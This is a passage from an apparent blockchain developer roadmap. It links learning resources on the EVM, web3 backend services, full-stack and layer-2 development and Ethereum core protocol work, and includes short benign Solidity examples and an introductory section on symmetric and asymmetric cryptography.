- Read Femboy Capital's [Playdate with the EVM](https://femboy.capital/evm-pt1)
- Go over OpenZeppelin's series on [Deconstructing smart contracts](https://blog.openzeppelin.com/deconstructing-a-solidity-contract-part-i-introduction-832efd2d7737/)
- Read [Analyzing smart contracts](https://costa.fdi.ucm.es/papers/costa/AlbertCGRR20bTR.pdf) by Elvira Albert (very math heavy)
- Read over [TakeNobu's slides on how the EVM works (visualized)](https://takenobu-hs.github.io/downloads/ethereum_evm_illustrated.pdf)
- Go over [design patterns section](#design-patterns)
- Go over the exemplary good codebases at the beginning of the [Solidity section](#solidity)
- Follow gas optimizoors like [@transmissions11](https://twitter.com/transmissions11) for gas alpha
- Get used to looking up gas costs for different opcodes at [EVM Codes](https://www.evm.codes/)
- Check out the [EVM execution specs](https://github.com/ethereum/execution-specs)
- Learn to use [Foundry](#testing) well
- Bonus resources in comments of [this Twitter thread](https://twitter.com/0x_doggie/status/1494025503446945799?s=20&t=jydW6zat0cCXAb3mUhPFWw)
Special thanks to [@0x_doggie](https://twitter.com/0x_doggie) and [@freddycoen](https://twitter.com/freddycoen), from whose threads I extrapolated these resources.
- [Thread 1](https://twitter.com/freddycoen/status/1485572733706682368)
- [Thread 2](https://twitter.com/0x_doggie/status/1496507944803848194)
You might also want to go through [Nick's Posts](https://ethereum.stackexchange.com/users/1254/nick-johnson) and [Jean's Solidity articles](https://jeancvllr.medium.com/solidity-tutorial-all-about-assembly-5acdfefde05c).
### Backend development
As far as blockchain development goes, most of the logic that traditional applications would consider backend is encapsulated within smart contracts. However, there are also complementary technologies that allow you to query data from blockchains, index the data, create databases so that you have on-demand data from custom APIs, use decentralized storage for content, handle user authentication / DID, and more. I wouldn't consider this its own specialization, but it is a sufficiently distinct skill set for me to cover it separately.
This image was created by my fren [Nader Dabit](https://twitter.com/dabit3) who is a full-stack blockchain developer that has created many useful guides, some of which I'll feature in the full-stack development section. This web3 stack landscape graphic comes from a recent blog post of his called [The complete guide to full-stack web3 development](https://dev.to/dabit3/the-complete-guide-to-full-stack-web3-development-4g74).
![web3 stack.png](./images/web3_stack.jpeg)
#### Decentralized File Storage
Many applications require storing files of all sorts and making them available to your decentralized applications. NFTs, for example, only have a link to the URI metadata on-chain, and that URI points to a decentralized storage endpoint on IPFS or Arweave. This means all the images and traits of the NFT are hosted on those file storage networks rather than on the Ethereum mainnet, in order to save on costs and allow for higher bandwidth. A small sketch of this pattern follows.
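A minimal, illustrative sketch (not a full ERC-721 implementation, which would normally come from a library like OpenZeppelin) of a contract that stores nothing but a metadata pointer per token:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

contract MetadataPointer {
    mapping(uint256 => string) private _tokenURIs;

    function setTokenURI(uint256 tokenId, string calldata uri) external {
        // e.g. "ipfs://<CID>/metadata.json" -- the image and traits live
        // on IPFS/Arweave, not on Ethereum itself.
        _tokenURIs[tokenId] = uri;
    }

    function tokenURI(uint256 tokenId) external view returns (string memory) {
        return _tokenURIs[tokenId];
    }
}
```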
**IPFS**
[IPFS](https://ipfs.io/) is one of the most popular decentralized file storage solutions out there; projects like [Filecoin](https://filecoin.io/) are built on top of it, and much NFT metadata is hosted on the network. Solutions like [NFT Storage](https://nft.storage/docs/) make it completely free to upload and host your NFT metadata by leveraging their JavaScript API.
**Arweave**
[Arweave](https://www.arweave.org/) is another such solution. Arweave is a type of storage that backs data with sustainable and perpetual endowments, allowing users and developers to truly store data forever – for the very first time. As a collectively owned hard drive that never forgets, Arweave allows developers to remember and preserve valuable information, apps, and history indefinitely.
An increasingly popular use case for decentralized file storage is web hosting. Since we are on a quest to build decentralized applications that are uncensorable, it is good practice to also decentralize the user interface by deploying it to decentralized file storage networks like IPFS and Arweave. This prevents the applications you build from being censored by centralized entities shutting down your deployments on platforms like Vercel, AWS, Azure, or any other. Good practice for modern applications includes open-sourcing the front end so that anyone can run it locally, deploying additional instances to decentralized file storage solutions, and usually also hosting a front end on a centralized server for added performance.
#### Indexing / Querying
The applications you will be building need to know the state of the blockchain so that your users know what is happening and can interact with the application effectively. An example of this is Uniswap's AMM: in order to call the swap function on the smart contracts, you need to know how many tokens you will get back for the amount of ETH you put into the contract. In order to display the current price of any asset, your application will either query data from the blockchain directly or use an indexing service that has that data already available. These APIs are very useful and are a critical part of any application. A sketch of the kind of quote calculation involved is shown below.
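A constant-product quote in the style of Uniswap v2's `getAmountOut` (0.3% fee); treat this as an illustrative sketch rather than the exact library code:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

library AmmQuote {
    // Given the pool reserves, this is the kind of calculation a frontend
    // or indexer performs to show users an expected output before they
    // actually call swap.
    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) internal pure returns (uint256 amountOut) {
        require(amountIn > 0, "insufficient input");
        require(reserveIn > 0 && reserveOut > 0, "insufficient liquidity");
        uint256 amountInWithFee = amountIn * 997; // 0.3% fee taken on input
        uint256 numerator = amountInWithFee * reserveOut;
        uint256 denominator = reserveIn * 1000 + amountInWithFee;
        amountOut = numerator / denominator;
    }
}
```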
**TheGraph**
A very popular service is [TheGraph](https://thegraph.com/en/). TheGraph is a decentralized indexing protocol that allows you to query networks like Ethereum, the protocol has an incentive layer that rewards indexers to create APIs for the data you specify. Developers can create so-called subgraphs, which are data APIs that make the data easily accessible through a GraphQL schema. GraphQL is a querying language that is used as an alternative to traditional REST APIs. GraphQL schemas are harder to set up initially, but in turn, they enjoy massive scalability. In order to learn more, check out [their documentation](https://thegraph.com/docs/en/). To learn how GraphQL works checkout the [official documentation](https://graphql.org/learn/), [HowToGraphQL](https://www.howtographql.com/) and [this YouTube playlist](https://www.youtube.com/watch?v=Y0lDGjwRYKw&list=PL4cUxeGkcC9iK6Qhn-QLcXCXPQUov1U7f&ab_channel=TheNetNinja) (although it may be a bit outdated by now, better check the documentation).
**CovalentHQ**
An upcoming service and simpler alternative to TheGraph is [Covalent](https://www.covalenthq.com/). Its API allows you to pull detailed, historical, and granular data from multiple blockchains with no code. It has a rich palette of endpoints serving data across categories including balances, NFTs, and DeFi. The APIs provide data for several different blockchains like Ethereum, Polygon, and Avalanche, and are currently free to use. In order to learn more, check out [their documentation](https://www.covalenthq.com/docs/) and [API docs](https://www.covalenthq.com/docs/api/#/0/0/USD/1). They also have an active [YouTube channel](https://www.youtube.com/channel/UCGn-T9qPiXAx490Wr6WPbOw) with a [playlist on building web3 projects](https://www.youtube.com/playlist?list=PL4d9xIzK1us3vqIFYqcS005qSVuq_AESa) using Covalent.
**Nodes as service**
One of the most common ways to query data from the blockchain is by calling the RPC endpoints of nodes that sync the full state of the blockchain. A node runs the Ethereum client software, holds all of its state, and syncs every time a new block appears. You can run your own node on consumer hardware, but this doesn't scale if you want to use those nodes to serve data for massive applications, as you'd need to build your own DevOps pipelines to scale to your needs. That's why most developers use a third-party node provider like [Alchemy](https://www.alchemy.com/), [Nodereal](https://nodereal.io), or [Infura](https://infura.io/). You can call these APIs using web3 libraries like [ethers.js](https://docs.ethers.io/v5/), [web3.js](https://web3js.readthedocs.io/en/v1.7.0/), or myriad others.
**Moralis**
[Moralis](https://moralis.io/) is a web3 development platform that automates your backend: instead of you having to query data from nodes, index the data, and create databases so that you don't hit the blockchain on every user request, Moralis does it for you. You instantiate a Moralis server that exposes all blockchain data through a REST API backed by a PostgreSQL database. It also has smart contract alerts, cloud functions, cross-chain user authentication, and more. The only downside of using Moralis is that it's a centralized service provider. It is the easiest way to get a backend for your dapp going, as Moralis has a very simple-to-use SDK that helps you tap into the APIs offered by their services. It is a great way to get started building backends as most of the heavy lifting is done for you.
To learn how to use Moralis, check out [their documentation](https://docs.moralis.io/introduction/readme) and [their YouTube channel](https://www.youtube.com/channel/UCgWS9Q3P5AxCWyQLT2kQhBw).
**Thirdweb**
[Thirdweb](https://thirdweb.com/) provides smart contracts, SDKs, and UI components that creators, game studios, and developers can integrate into their apps.
To learn how to use Thirdweb, check out [their documentation](https://portal.thirdweb.com/).
#### Oracles
Oracles are data feeds that bring off-chain data on-chain so that the smart contracts that you build can query real-world information and build logic around it. For example, prediction market Dapps use oracles to settle payments based on events. A prediction market may ask you to bet your ETH on who will become the next president of the United States. They'll use an oracle to confirm the outcome and payout to the winners.
- [What is an oracle? - Chainlink](https://youtu.be/ZJfkNzyO7-U?t=10)
[Chainlink](https://chain.link/) is the most popular oracle out there, you'll usually use it to get price feeds, to get verifiable randomness, to call external APIs, etc. If you want to get started building with Chainlink, go to [their documentation](https://docs.chain.link/).
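To get a feel for what consuming a Chainlink price feed looks like, here is a minimal sketch assuming Chainlink's documented `AggregatorV3Interface`; the feed address for your target network (e.g. the ETH/USD feed) comes from the Chainlink docs:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Subset of Chainlink's AggregatorV3Interface needed for a price read.
interface AggregatorV3Interface {
    function decimals() external view returns (uint8);

    function latestRoundData()
        external
        view
        returns (
            uint80 roundId,
            int256 answer,
            uint256 startedAt,
            uint256 updatedAt,
            uint80 answeredInRound
        );
}

contract PriceConsumer {
    AggregatorV3Interface public immutable priceFeed;

    constructor(address feed) {
        priceFeed = AggregatorV3Interface(feed);
    }

    // Returns the latest reported price and the feed's decimal precision.
    function latestPrice() external view returns (int256 answer, uint8 decimals) {
        (, answer, , , ) = priceFeed.latestRoundData();
        decimals = priceFeed.decimals();
    }
}
```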
#### DID / Authentication
DID (decentralized identity) and web3 user authentication are a disruptive new primitive on the internet, as for the first time in human history we can be self-sovereign users of the internet and own our value within it. Usually, your user profile is managed by centralized service providers like Google, Facebook, Apple, Amazon, and others. In web3, the concept of a digital identity is much broader, spanning areas such as financial history, games, social interaction (decentralized social media, i.e. [Lens Protocol](https://github.com/aave/lens-protocol)), and much more. It is still not clear what web3 user management will look like a few years from now, but there are a few solutions that are being standardized and are emerging as potential winners.
**SpruceID**
[SpruceID](https://www.spruceid.com/) is a decentralized identity toolkit that allows users to sign and verify W3C verifiable credentials, configurable across many interfaces. Use cases cited in the [SpruceID documentation](https://spruceid.dev/docs/) include: authenticity for NFT creators, decentralized backup or recovery of decentralized identity, decentralized onboarding for private DeFi pools, decentralized app hosting, and many more potential use cases in the future. In order to integrate the Spruce DID solutions, visit their developer portal.
**Sign-in with Ethereum**
[Sign-in with Ethereum](https://login.xyz) is an initiative that came out of [EIP-4361](https://eips.ethereum.org/EIPS/eip-4361), which set out to standardize how Ethereum accounts interact and authenticate with off-chain services by signing a standard message format parameterized by scope, session details, and security mechanisms (e.g., a nonce). The goals of this specification are to provide a self-custodied alternative to centralized identity providers, improve interoperability across off-chain services for Ethereum-based authentication, and provide wallet vendors a consistent machine-readable message format to achieve improved user experiences and consent management.
Many application builders have already adopted this signature standard for building applications on Ethereum as it streamlines the process for everyone and makes it more seamless for users since they have easily readable signatures from [EIP-191](https://eips.ethereum.org/EIPS/eip-191). The aim of this EIP specification is to create a login standard similar to how web2 login with Google and Facebook became catalysts for adoption.
#### Automation
Within blockchain applications there are many actions that are repetitive and cumbersome to execute, for example, having to change the liquidity provision ranges inside of an active Uniswap v3 liquidity provision strategy, claiming rewards from yield vaults, and many other actions that users would like to automate so as to not have to deal with manual execution overhead.
**Gelato network**
[Gelato Network](https://www.gelato.network) is an automation protocol that runs as a decentralized network of bots used by web3 developers to automate smart contract executions on public EVM compatible blockchains including Ethereum, Polygon, Fantom, Arbitrum, Binance Smart Chain, and Avalanche.
In order to get started automating tasks inside of your application check out the [official Gelato documentation](https://docs.gelato.network/guides/tutorial) which has tutorials on how to set up bots to regularly execute any given task in exchange for a small transaction fee.
The setup inside of the contract function that you want bots to run would look something like this:
![gelato.png](./images/gelato.png)
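Gelato tasks are commonly wired up through a resolver: a view function that tells the bot network whether a task can run and with what calldata. The sketch below assumes that resolver-style interface and a hypothetical `IVault`; the exact function names and current API should be taken from the Gelato documentation:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Hypothetical vault that Gelato bots should harvest periodically.
interface IVault {
    function lastHarvest() external view returns (uint256);
    function harvest() external;
}

contract HarvestResolver {
    IVault public immutable vault;
    uint256 public constant INTERVAL = 1 days;

    constructor(IVault _vault) {
        vault = _vault;
    }

    // Bots call this off-chain; when `canExec` is true they submit a
    // transaction with `execPayload` against the target contract.
    function checker() external view returns (bool canExec, bytes memory execPayload) {
        canExec = block.timestamp >= vault.lastHarvest() + INTERVAL;
        execPayload = abi.encodeCall(IVault.harvest, ());
    }
}
```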
#### Miscellaneous APIs
When building applications you will want to display miscellaneous information from various different other applications or protocols, e.g. price feeds for different tokens on different AMMs, the price of NFTs listed on different marketplaces, various data from services your application relies on, etc. As a backend developer, your responsibilities are to know where you can find reliable sources of data for your application and build the infrastructure needed to fetch it so that frontend developers can display it on the site. It is also important to build redundancy of the data you query and store it in your own databases in order to prevent your application from failing in the case of API dependency failure.
**Opensea**
A good example of such an API is [OpenSea's API](https://docs.opensea.io/reference/api-overview), which is public and can be queried to get the prices of NFT listings on OpenSea, floor prices, volumes, other historical price data, NFT metadata, and more.
As a developer, you can also create your own databases and API endpoints to fetch data from them. It is also a good way to earn revenue, by creating SaaS services around API keys with rate limits on how much data anyone can query from your servers. To build such APIs you could, for example, use a REST infrastructure with NodeJS and PostgreSQL, or write a TheGraph subgraph.
### Full-stack blockchain development
As the name implies, full-stack blockchain development is the closest specialization to being a jack of all trades. It involves building out all aspects of an application, from the front end to smart contracts to the backend (at least to a certain degree). This is the most generic role that most blockchain developers take and the one most companies and DAOs are looking for in a contributor. Since there is such a high demand for quality developers in the space, it is oftentimes the case that employers onboard people from different fields and turn them into jacks of all trades within web3 development, so as to save costs and reduce HR resource requirements (which are incredibly scarce nowadays).
Since rewriting the [front end](#front-end-development), [back end](#back-end-development) and [smart contract](#smart-contract-development) sections would be pointless, I'll dedicate this section just to list a bunch of full-stack guides, tips and tricks, deployment guidelines, project management, and other relevant information.
#### Full-stack guides
- [Introduction to Ethereum Development](https://www.youtube.com/watch?v=MlJPjJQZtC8) - [Austin Griffith](https://twitter.com/austingriffith)
- [The Complete Guide to Full Stack Web3 Development](https://dev.to/dabit3/the-complete-guide-to-full-stack-web3-development-4g74) - [Nader Dabit](https://twitter.com/dabit3)
- [Speed Run Ethereum](https://speedrunethereum.com/) - [Austin Griffith](https://twitter.com/austingriffith)
- [Solidity, Blockchain, and Smart Contracts Course - Beginner to Expert Python Tutorial](https://www.youtube.com/watch?v=M576WGiDBdQ) - [Patrick Collins](https://twitter.com/PatrickAlphaC)
- [Full-stack blockchain solidity course](https://github.com/smartcontractkit/full-blockchain-solidity-course-py) - [Patrick Collins](https://twitter.com/PatrickAlphaC)
#### Full-stack tutorials
- [Introduction to Ethereum](https://www.youtube.com/watch?v=MlJPjJQZtC8)
- [Build Uniswap Blockchain Web3 App with Solidity | Next.js | Sanity.io](https://www.youtube.com/watch?v=xXxjRzdYIss)
#### Building and deploying on L2s and DA layers
Coming soon
#### Optimism
- [Developer docs](https://community.optimism.io/docs/developers/)
- [New Bedrock protocol specs](https://github.com/ethereum-optimism/optimistic-specs/)
#### Arbitrum
- [Developer docs](https://developer.offchainlabs.com/docs/developer_quickstart)
- [Protocol description](https://developer.offchainlabs.com/docs/rollup_protocol)
#### zkSync
- [Developer docs](https://docs.zksync.io/dev/)
- [New 2.0 docs](https://v2-docs.zksync.io/dev/)
#### Starknet / StarkEx
- [StarkNet / Cairo docs](https://starknet.io/docs/)
### Core protocol development
#### General Learning
There are many topics to learn about in core development; one can specialize in any area. Here is a selection of learning resources.
Basic:
- Merkle trees:
- [Ethereum execution-layer Merkle Patricia Tree walkthrough](https://dzone.com/articles/ethereum-yellow-paper-walkthrough-27)
- [Execution and Consensus layer Merge design](https://www.youtube.com/watch?v=8N10a1EBhBc), video by Danny Ryan
- [Rollup centric roadmap](https://ethereum-magicians.org/t/a-rollup-centric-ethereum-roadmap/4698), post by Vitalik
- Ethereum protocol ELI5 (coming soon)
Medium:
- [Yellow Paper](https://ethereum.github.io/yellowpaper/paper.pdf): L1 protocol specification in paper form
- [ABI: Application Binary Interface](https://docs.soliditylang.org/en/v0.8.11/abi-spec.html) to interact with contracts
- [EVM opcodes](https://www.evm.codes/): interactive reference
- [RLP](https://eth.wiki/fundamentals/rlp): the encoding used everywhere in execution-layer
- [SSZ specs](https://github.com/ethereum/consensus-specs/blob/dev/ssz/simple-serialize.md): encoding and merkleization of Eth2,
also see [visualized encoding](https://github.com/protolambda/eth2-docs/blob/master/eth2-ssz.svg)
and [visualized hash-tree-root](https://github.com/protolambda/eth2-docs/blob/master/eth2-htr.svg).
- [EVM](https://ethereum.org/en/developers/docs/evm/): overview of the machine that runs smart-contracts
- Executable specs: readability-first python implementations of the protocol specification.
- [Consensus-layer](https://github.com/ethereum/consensus-specs), also see [pip package](https://pypi.org/project/eth2spec/)
- [Execution-layer](https://github.com/ethereum/execution-specs), also see the [rendered version](https://ethereum.github.io/execution-specs/).
- [Simplified Eth2 Phase0 specs intro](https://notes.ethereum.org/@djrtwo/Bkn3zpwxB)
- [Light client design](https://www.youtube.com/watch?v=ysW-Bq05pJQ) and [implementation](https://www.youtube.com/watch?v=bX8I9U2PYMk)
Advanced:
- Builder proposer separation:
- [Proposer/block builder separation-friendly fee market designs](https://ethresear.ch/t/proposer-block-builder-separation-friendly-fee-market-designs/9725)
- [Flashbots: frontrunning the MEV crisis](https://ethresear.ch/t/flashbots-frontrunning-the-mev-crisis/8251)
- [state of research](https://notes.ethereum.org/@vbuterin/pbs_censorship_resistance)
- [Fork-choice Gasper paper: Combining GHOST and Casper](https://arxiv.org/abs/2003.03052)
- [Dagger-Hashimoto (legacy PoW)](https://eth.wiki/concepts/dagger-hashimoto)
- State DB design, Erigon docs:
- [Choice of storage engine](https://github.com/ledgerwatch/erigon/wiki/Choice-of-storage-engine)
- [State representation](https://github.com/ledgerwatch/erigon/blob/devel/docs/programmers_guide/guide.md)
- BLS:
- [Signature aggregation in eth2](https://ethresear.ch/t/pragmatic-signature-aggregation-with-bls/2105) by Justin Drake
- [BLS12-381 For The Rest Of Us](https://hackmd.io/@benjaminion/bls12-381) by Ben Edgington
- [BLS Signature for Busy People](https://gist.github.com/paulmillr/18b802ad219b1aee34d773d08ec26ca2) by Paul Miller
- KZG:
- [KZG polynomial commitments](https://dankradfeist.de/ethereum/2020/06/16/kate-polynomial-commitments.html) by Dankrad Feist
- [ZK Study Club part 1: polynomial commitments](https://www.youtube.com/watch?v=bz16BURH_u8) by ZK FM podcast with Justin Drake
- ZK:
- [ZK study club playlist](https://www.youtube.com/watch?v=Pnc9J7uQgqs&list=PLj80z0cJm8QHm_9BdZ1BqcGbgE-BEn-3Y) by ZK FM podcast
- Fraud proofs (optimistic rollup tech):
- [The State of Optimistic Rollup](https://medium.com/molochdao/the-state-of-optimistic-rollup-8ade537a2d0f) older overview by Daniel Goldman
- [Inside Arbitrum](https://developer.offchainlabs.com/docs/inside_arbitrum) arbitrum fraud proof
- [Cannon](https://medium.com/ethereum-optimism/cannon-cannon-cannon-introducing-cannon-4ce0d9245a03) optimism fraud proof
- [LibP2P](https://docs.libp2p.io/): the network layer in Eth2, Polkadot, Filecoin and other blockchains.
- [DevP2P](https://github.com/ethereum/devp2p/): the original network layer in Eth1 / execution-layer of ethereum.
- [Whisk: A practical shuffle-based SSLE protocol for Ethereum](https://ethresear.ch/t/whisk-a-practical-shuffle-based-ssle-protocol-for-ethereum/11763)
- [VDF research](https://vdfresearch.org/): verifiable delay function for ethereum and other protocols
- Data Availability Sampling (DAS):
- [DAS in practice](https://notes.ethereum.org/@vbuterin/r1v8VCULP)
- [DAS in full sharding design](https://hackmd.io/@vbuterin/sharding_proposal)
#### L2
Layer-2 scales Layer-1 by increasing capacity without significantly changing the security assumptions inherited from Layer-1.
Although this does not change L1 itself, it does influence the general scaling design direction,
generally pushing ethereum into a [rollup-centric roadmap](https://ethereum-magicians.org/t/a-rollup-centric-ethereum-roadmap/4698).
Domains:
- Side-chains: [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/sidechains/), [eth org](https://ethereum.org/en/developers/docs/scaling/sidechains/)
- State channels: [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/state-channels/), [eth org](https://ethereum.org/en/developers/docs/scaling/state-channels/)
- Plasma (mostly deprecated): [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/plasma/), [eth org](https://ethereum.org/en/developers/docs/scaling/plasma/)
- Rollups [intro by Polynya](https://polynya.medium.com/rollups-data-availability-layers-modular-blockchains-introductory-meta-post-5a1e7a60119d)
- ZK rollups (ZKRUs): [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/zk-rollups/), [eth org](https://ethereum.org/en/developers/docs/scaling/zk-rollups)
- Optimistic rollups (ORUs): [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/optimistic_rollups/), [eth org](https://ethereum.org/en/developers/docs/scaling/optimistic-rollups/)
- Bridges: [eth org intro](https://ethereum.org/en/bridges/)
- L3 / validiums / volitions, etc.:
- [starkware L3](https://medium.com/starkware/fractal-scaling-from-l2-to-l3-7fe238ecfb4f)
- [Validium eth org intro](https://ethereum.org/en/developers/docs/scaling/validium/)
Refer to [L2beat.com](https://l2beat.com/) for an overview of active L2 scaling solutions.
#### L1
Domains:
- Eth1 / execution layer
- Networking: devp2p
- EVM
- Tx pool
- Sync methods (Fast, Snap, Archive, Beam, Light)
- State DB
- User-facing (JSON RPC, tx tracing, etc.)
- Eth2 / consensus layer
- Networking: libp2p
- Fork-choice
- Attestations / BLS aggregation
- Staking / Validator clients
- Slashings
- Sharding
##### News
Selection of protocol news resources:
- [Week in Ethereum](https://weekinethereumnews.com/): OG weekly newsletter
- [Eth2.News](https://eth2.news): eth2 news by Ben Edgington
#### Communication
- [Discord Eth R&D server](https://discord.gg/EyK6HmMcmy)
- [Eth magicians](https://ethereum-magicians.org/), forum for governance / protocol discussion
- [Eth research](https://ethresear.ch/), forum for research discussion
- AllCoreDevs (ACD): [discord channel in R&D](https://discord.gg/S6r6RcWPC3)
- Ethereum Foundation [youtube channel](https://www.youtube.com/c/EthereumFoundation) (streams ACD and Consensus calls)
#### L1 Specifications
##### Execution layer
- [Ethereum Improvement Proposals: EIPs](https://eips.ethereum.org/)
- [Execution APIs](https://github.com/ethereum/execution-apis/)
- [New Execution py-specs](https://github.com/ethereum/execution-specs)
##### Consensus layer
- [Consensus specs](https://github.com/ethereum/consensus-specs)
- [Beacon APIs](https://github.com/ethereum/beacon-APIs), also see [interactive site](https://ethereum.github.io/beacon-APIs/)
- [Annotated specs](https://github.com/ethereum/annotated-spec) by Vitalik Buterin
- [Eth2 book](https://eth2book.info/altair/contents): extended annotated specs with some eth2 history, by Ben Edgington
- Legacy (but good) resources:
- [Proof Of Stake F.A.Q.](https://eth.wiki/en/concepts/proof-of-stake-faqs)
- [Sharding F.A.Q.](https://eth.wiki/sharding/Sharding-FAQs)
- [Ethereum sharding research compendium](https://notes.ethereum.org/@serenity/H1PGqDhpm?type=view)
#### Ethereum core teams
Client teams (those that are open-source), in no particular order:
| Domain | Project | Language | Discord | Docs |
|-------------|--------------------------------------------------------------------------------------------------------------|---------------|----------------------------------------------------------------------------|--------------------------------------------------------------------|
| Eth2 | [Prysm](https://github.com/prysmaticlabs/prysm) | Go | [invite](https://discord.gg/fbHjSdy) | [docs](https://docs.prylabs.network/docs/getting-started/) |
| Eth2 | [Lighthouse](https://github.com/sigp/lighthouse) | Rust | [invite](https://discord.gg/uC7TuaH) | [docs](https://lighthouse-book.sigmaprime.io/) |
| Eth2 | [Lodestar](https://github.com/ChainSafe/lodestar) | Typescript | [invite](https://discord.gg/Quv3nJX) | [docs](https://chainsafe.github.io/lodestar/) |
| Eth1 + Eth2 | Nimbus [eth2](https://github.com/status-im/nimbus-eth2) and [eth1](https://github.com/status-im/nimbus-eth1) | Nim | [invite](https://discord.gg/YbTCNat) | [docs](https://nimbus.guide/) |
| Eth2 | [Teku](https://github.com/consensys/teku) (Artemis + Harmony) | Java / Kotlin | [invite](https://discord.gg/vZPbTfw) | [docs](https://docs.teku.consensys.net/en/latest/) |
| Eth1 | [Go-ethereum](https://github.com/ethereum/go-ethereum) | Go | [invite](https://discord.gg/nvKEx7QBJc) | [docs](https://geth.ethereum.org/docs/) |
| Eth1 | [Nethermind](https://github.com/NethermindEth/nethermind) | C# | [invite](https://discord.gg/esp8n6W) | [docs](https://docs.nethermind.io/nethermind/) |
| Eth1 | [Besu](https://github.com/hyperledger/besu) | Java | [invite](https://discord.gg/mEm2QcVxFN) | [docs](https://wiki.hyperledger.org/display/BESU/Hyperledger+Besu) |
| Eth1 | [ethereum-JS](https://github.com/ethereumjs/ethereumjs-monorepo) | Javascript | [invite](https://discord.gg/qJJkE3RKUz) | [docs](https://ethereumjs.readthedocs.io/en/latest/) |
| Eth1 | [Erigon](https://github.com/ledgerwatch/erigon) | Go | [Invite-only](https://github.com/ledgerwatch/erigon#erigon-discord-server) | [docs](https://github.com/ledgerwatch/erigon/tree/devel/docs) |
#### Computer science
#### Client development
#### Geth
### MEV searcher
Coming soon.
### Security engineer
WIP
### Cryptography
Cryptography is the backbone of distributed ledgers. No distributed permissionless system is possible without asymmetric cryptography. If you are interested in building decentralized applications, it's essential to understand the wallet generation and transaction signing processes, both of which rely heavily on underlying cryptographic protocols. Throughout this section, I provide a wide array of information about cryptography.
**DISCLAIMER:** While playing with these algorithms on your own is a great way to learn, you **NEVER** want to use your own cryptographic protocols in a production environment. The existing libraries have been well-vetted and battle-tested over many years. Because cryptography is complex by design, attempting to roll your own cryptographic protocols is incredibly dangerous.
#### What is cryptography
Cryptography is the study of enciphering and deciphering information in a way that preserves the privacy of the enciphered information.
Modern cryptography is mathematically robust and plays a critical role in securing sensitive information like your bank account numbers and social security number. While the mathematics may seem complex and intimidating, the concepts are graspable even without completely understanding the encryption algorithms.
Cryptography is made up of a collection of primitives which serve as building blocks for different cryptographic protocols. Some examples of cryptographic primitives include hash functions such as SHA-256 and MD5 (one-way maps) and verifiable random functions (VRFs). True randomness is extremely difficult to capture, but mathematicians have developed ways to construct randomness that is indistinguishable from *true randomness*.
These primitives are used to build more robust tools like ciphers. Ciphers are algorithms used to conceal (encrypt) and reveal (decrypt) information. The encrypted data is called ciphertext, while the decrypted information is called plaintext. There are two general categories of ciphers, symmetric ciphers and asymmetric ciphers. We will go into the differences and some examples throughout this section.
#### Symmetric Ciphers
A cipher is symmetric when the same key used to encrypt information is also used to decrypt it. A simple example of this is the XOR cipher. To encrypt with an XOR cipher, you XOR the bits of the key with the bits of the plaintext. To decrypt, you XOR the same key with the ciphertext. I have provided an XOR truth table below for convenience.
| A | B | A XOR B |
| -- | - | ------ |
| 0 | 1 | 1 |
| 0 | 0 | 0 |
| 1 | 1 | 0 |
| 1 | 0 | 1 |
**NOTE:** this cipher is broken if the same key is used more than once. See this [article](https://idafchev.github.io/crypto/2017/04/13/crypto_part1.html) for the details.
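For illustration only, here is a toy XOR cipher written in Solidity (remember the disclaimer above: never roll your own crypto, and anything sent to a public chain is visible to everyone anyway). The same routine both encrypts and decrypts, since XORing twice with the same key restores the original bytes:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

library XorCipher {
    // Toy example: XORs each byte of `data` with the key, repeating the
    // key as needed. Key reuse is exactly the weakness noted above.
    function xorBytes(bytes memory data, bytes memory key) internal pure returns (bytes memory out) {
        require(key.length > 0, "empty key");
        out = new bytes(data.length);
        for (uint256 i = 0; i < data.length; i++) {
            out[i] = data[i] ^ key[i % key.length];
        }
    }
}
```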
Other examples of symmetric ciphers include substitution ciphers like [Caesar's Cipher](https://en.wikipedia.org/wiki/Caesar_cipher) and permutation (transposition) ciphers. Both are easily broken by [frequency analysis](https://en.wikipedia.org/wiki/Frequency_analysis), as are most monoalphabetic (single-alphabet) symmetric ciphers.
There are existing Symmetric ciphers that have not been broken. A good example is the Advanced Encryption Standard or [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard). However, the security of AES relies on having a sufficiently large key size.
Symmetric ciphers work well until you need to share the key securely. You and the receiving party must share a key in order to exchange private information over a secure communication channel, and you can see the chicken-and-egg problem forming: how do you securely share the key in the first place?
#### Asymmetric Ciphers
The ciphers that distributed ledgers rely on today are asymmetric ciphers. Asymmetric ciphers address the key exchange problem presented above by using a different key to encrypt information than to decrypt it. These keys are known as the public and private key pair. The asymmetric cryptosystem is only possible because of a mathematical relationship between the public and private key pair. The first breakthrough in asymmetric cryptography was the Rivest–Shamir–Adleman [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)) cipher, named after its creators. The security of RSA relies on the fact that factoring the product of two large prime numbers is hard; a related hardness assumption, [the discrete log problem](https://en.wikipedia.org/wiki/Discrete_logarithm), underlies Diffie–Hellman and elliptic curve cryptography. These ciphers allow anyone to encrypt information intended for you with your public key, but only you can decrypt it with your private key.
While RSA was a breakthrough in cryptography, it was computationally not as fast as some of the leading symmetric ciphers at the time. Thus, RSA was used to securely share the symmetric key, after which the symmetric cipher was used. RSA was the state of the art until a class of curves, first studied in connection with the work of [Diophantus](https://en.wikipedia.org/wiki/Diophantus) roughly 2000 years ago, was explored for a better approach.
There is an algebraic structure called a [finite field](https://en.wikipedia.org/wiki/Finite_field). In a finite field, the elements obey slightly more abstract rules than the arithmetic operators on real numbers. You can define a finite field of rational points on a curve, given that you can define multiplication and addition between these points such that the results remain rational points on the curve. The class of curves over which such fields are defined for asymmetric cryptography are called elliptic curves, and they follow the general equation y<sup>2</sup> = x<sup>3</sup> + ax + b, where a and b are constants.
